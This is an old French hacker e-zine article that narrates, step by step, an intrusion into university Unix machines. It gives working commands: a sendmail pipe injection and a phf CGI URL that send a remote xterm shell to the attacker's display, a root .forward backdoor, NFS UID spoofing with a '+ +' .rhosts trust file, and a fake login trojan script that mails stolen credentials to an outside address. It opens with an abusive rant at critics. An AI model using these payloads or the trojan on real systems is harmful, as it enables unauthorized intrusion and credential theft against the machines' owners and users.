                              $$$$$$$$$$$$$
                             $  intrusion  $
                            $       by      $
                            $      CoD4     $
                             $             $
                              $$$$$$$$$$$$$ 

0: hum  avant tous je veux passer un coup de geule aupres de ceux qui critique 
   NoRoute . dis moi mec si ca te plait poa car  C poa assez de ton NiVO 
   ben le lis poa fait autre chose jardine je sais poa moi ecrit nous donc
   un article ! ben non c vrai que on est des lames on est poa une elite 
   comme toi ! toi tu veux ecrire que dans phrack toi. t le dieu aupres 
   des plus grands MOuHaHa tous le monde le sait que t un mec qui en c pas
   plus que Nous meme moins ! c bien beau de ta la jouer en balancant des vannes 
   debiles sur le mag HE GroS MaLin ! si tu avais un mininum d"intelligence
   tu viendrais avec nous faire bouger la scene francaise ! ton attitude 
   de merde la faite eteindre !!! assasin de toute chose nouvelles tu est 
   plus qu"un putain de crasheur de daube. mec au lieu de te branler 
   viens faire  bouger la scene sinon ben je sais poa moi va travailler 
   pour la DST ! 

1:
j"ecris se filez pour tous ceux ki essaye de comprendre comment je fais 
pour arriver de certaine ip  :) . car il faut dire ke j"en ais marre de
repondre a """comment ta fais pour rentrez ? """ :) 
bon de quoi en faire un drame Z'allez me dire ben vi mais c que generalment
la reponse a se genre  de question demande des tones d"explications ! 
donc je me suis decider  a ecrire un tit filez sur l'intrusion qui est ma 
specialite (je dis poa que je suis le specialiste mais seulment que c la
facette du hacking ou  je suis  le plus a L"aise :) ok bon Lets Play !   

2: bhoouuuuu 
bon voila vous avez reperez un site genre une univ ou un gros domaine 
ou quoi que se soit d"autre on s"en fout :)

2.1: faite un tour rapide de la machine cible on s"ais jamais peut etre quelle 
dispose d"un gros bug de securite si oui bon est bien que demande le peulple
(je repasse poa la technique de scan d"une machine ya deja pas mal de txt
dessus dans le Noroute #1 et #2 )

2.2: bon est bien la machine semble bien proteger a premiere vue. bien 
si cette machine est proteger passons a une autre . pour savoir ou
attaker  faite voir
 
% showmount -e host
 
la vous allez voir la liste des machine auquelle notre victime fait confiance
un minimun il tres intersant de savoir a qui la machine fait confiance sa
nous permetras de sauter  de machine en machine !

un autre commande pour avoir des infos c expn exemple:

% telnet www.victim.com 25  
Trying 123.132.123.13...
Connected to www.victim.com
Escape character is '^]'.
220 www.victim.com ESMTP Sendmail 8.8.5/8.8.5; Tue, 20 May 1997 20:13:11
+0200  
expn root (ou un autre user)
250-root <clown@bibi.victim.com>
250 root <root@bheu.victim.com>

la commande expn permet de voir le .forward d"un user ( le .forward 
est le fichier qui est consulter lorsque on envoie un mail par exemple la 
si on envoie un mail au root de www.victim.com ben son mail sera renvoyer
a clown@bibi.victim.com et root@bheu.victim.com  nous verons plus tard
comment le .forward peut etre utile pour se faire une belle backdoor :) )

donc la vous voyer que l"user root de www a un compte sur la machine bheuu et 
sur bibi . donc on peut dire que si vous hackez une des machine(bheu ,bibi)
vous pourez facilment avoir acces a www

voici encore un autre commande pour des info 
% rusers -al www.victim.com 

la vous voyez kelle mec est de kelle IP est sur www 
noter bien les ip et login des mec que rusers vous donne
car si vous avez poa reussi a hacker une machine du domaine alors 
vous pouvez toujours hacker la machine  des  users  qui se connecte
 
 et bien sur le fameux finger 
% finger @www.victim.com

bon la c"est le meme topo que avec rusers  

3: bon si on allez un peu jumper !
bon as partir de la je reprends un hack que j"ais fait tous est exactement
pareil chose bien sur les noms de machines :)

voila j"ais reperer en fesant des rusers sur www.victim.com une ip qui
venait d"un domaine ou il avait de forte chance que je trouve une faille 
bon ok alors je lance mon tit rpcinfo ..MeRDE !!! il est derriere un
firewall .... 
bon je vais pas me decourage je scan donc tous le domaine tiens un sendmail
reponds  hop un tit telnet sur le port 25 PUTAIN  COOOOOOLLLLL un  AIX !!!
mouhahah j"aime les univ des usa  qui aime bien acheter IBM !hahah bon treve
de plaisanterie je m"envoie un xterm par le sendmail :) allez par bonte 
je vous montre comment on fais ;)  

xterm-par-sendmail-pourie (c) CoD4 
[vi il semble bien que je sois le premier mec a avoir penser a ca :)]
 
bon donc je telnet le port 25 est je tape ca 
mail from: "|xterm -display xxx.dyn.ml.org:0 -e /bin/sh "
rcpt to: biiiiiii
data
.
quit 
 
voila bon oubliez poa de faire xhost + sinon ca marchera poa 
bon si ca veut poa venir c peut etre a coze du patch du xterm
voila le patch sur les diferent system
sunons: /usr/openwin/bin/xterm
AIX:    /usr/bin/X11/xterm
linux: /usr/X11R6/bin/xterm
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
a cOMPLeTER 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
bon bien sur vous pouvez aussi vous envoyer des xterm par phf 
 http://www.suxx.com/cgi-bin/phf?Qname=%0A/usr/openwin/bin/xterm%20-display%20
 [votre-ip]:0%20

donc une fois avec le xterm dans les pognes j"avais avancer d"un point
j"etais sur le meme domaine ke l"user qui se connecter sur www.victim.com
bon je regarde un peu si la machine  ou je suis se font confiance
 
% cat /etc/hosts.equiv 

bon rien d"interresant la :(

heuu je regarde le /.rhosts du root 
haha  il fait confiance a une autre machine cool mais c poa la bonne hehe
ensuite un tit last pour voir kelle user vient de la machine cible ke je
veut hacker (toujours celle du mec ki se connex a victim :) bon rien de bien
beau (**** je donne ces commande c pas pour rien ! car sur chaque systeme ya
beaucoup de truc a apprendre avec c quelque commande****)

bon tiens je vais faire un showmount sur la machine pour voir ...HEY !
youpi elle exporte son /home/ au autre machine .
....
(c tres pratique pour un user qui se ballade de machine en machine ca lui
permet d"avoir toujours son /home sur chaque machine )
....
bon ok now faut ke je passe root hum je lance donc une tripotes d"exploit
putain rien marche bheuuu comment faire....

heuuu je refais un cat /.rhosts  je look les machine ki sont dedans re
telnet  25 la bas hehe un AUTRE AIX !!! bon je re utilise ma methode :)
des xterm .
je lance un exploit hop je suis root . bon je viens pour mounter les 
/home exporte de la machine cible NOOOOOOOOOOON il y"a poa mount !!
putain !! bon je doit faire un rsh sur la machine d"avant (le premier AIX ;) 
le bleme c ke j'ais k'un shell de root je suis poa loger en root :*(
 
bon j'edite le /etc/passwd hop je vire le '!' root:!:0:1:bibi:/:/bin/sh  
comme ca le root a poa de passwd hehe  allez telnet localhost 
login: root
blabla ...
poa bon PutAIn il veux poa car j"ais poa de password ! bon la vous
auriez pus pensez ke la situation est deseperez ben NON !!
il reste un truc echo "|xterm -display xxx.dyn.ml.org:0" >> ~root/.forward 
hehe voui.
 
le .forward est un fichier magique ki vous permez d"executer un prog
lorsque vous recvez un mail :) .
bon j"envoie un mail au root j'attends PAF le xterm est la ouf .
bon je peux enfin faire rsh  

%rsh www.aix-pourie-1.com -l root csh -i 

est me voila avec une beau shell ;)  je peux enfin mounter le /usr exporte
de la machine de l"user ki se connex sur victim (ben oui je le rappelle des
fois ki en ais ki est oublier ) une fois les /home mouter je veux foutre un 
petit  .rhosts  a moi avec "+ +" dans le /home de notre mec.
pour cela il faut  ke je sois avec le meme uid 
(nfs je base sur les UID pour les droits ) 
bon  je trafique le uid d"un povre user puis #su - povmec hehe la NFS croit 
ke je suis l"autre hop je vais dans son /home 

%echo "+ +" > /mnt/home/bibi/.rhosts (on dis ke le mec s"appelle bibi)
%rsh irix.aix-pourie.com  -l bibi csh -i (oui c poa un aix )
$
 
nous voila donc maitent l"user ke nous ki se connecter jamais ;)
hehe la j"ais installer un tit telnet trojan histoire de choper 
son l/p sur victim :)

#!/bin/sh
BANNER="bibiauski.bewm.com System XYZ"
trap "" 1 2 3
while ;; do
  echo
  echo $BANNER
  echo
  echo -n "Login: "
  read L
  case $L in
    "") ;;
    *) break ;;
  esac
done
echo -n "Password: "
stty -echo
read P
echo
echo "Login incorrect"
echo "$L $P" | mail hacker@hotmail.com

on attends un peu est le lendmain j"avais le l/p YEAH !!!
bon voila comment j"ais fait pour avoir acces a une fucking machine 

allez HaPPY HAcK!

CoD4 
greetzzzzzzzzZZZzzzzZZZZZzZZzZzzzzzzzzzzZZzz to hop hop 

Kewl4 sans lui on serait poa arrivait a grands chose ;) enfin sans sa PC
:)  non ;))  Mikasoft  , giemor , JFF ,SaRace, pAceMaker,GLOU ,k0rtex , sorcery
 mac-mahon ,[[Kauf]],HotcOde,yodah,manitinx,titia,ben_be,rapha,t_void,tk1,
sibere,a|vin, mon bot, le chien , heuu tia carrere (comme ca vous allez
croire ke je la connais :), doC|sedov, pixel4,sd4, tous se de #phe 
de #thc  pis bien sur de #Noradre 
pis vi tiens se de #bordeaux mouhahah ;)
!!-JOKE-!! un super greetz pour KIL tiens :) 
fait nous pt des mix bon allez c ke les greetzzz devienne enorme la :)
ha oui greetz a boomb et fatalman :)


                   ############## 
                 ################
                 # MARION'S    ##
                 #   KiLLER'S  ##
                 #     @INC    ##
                 ###############
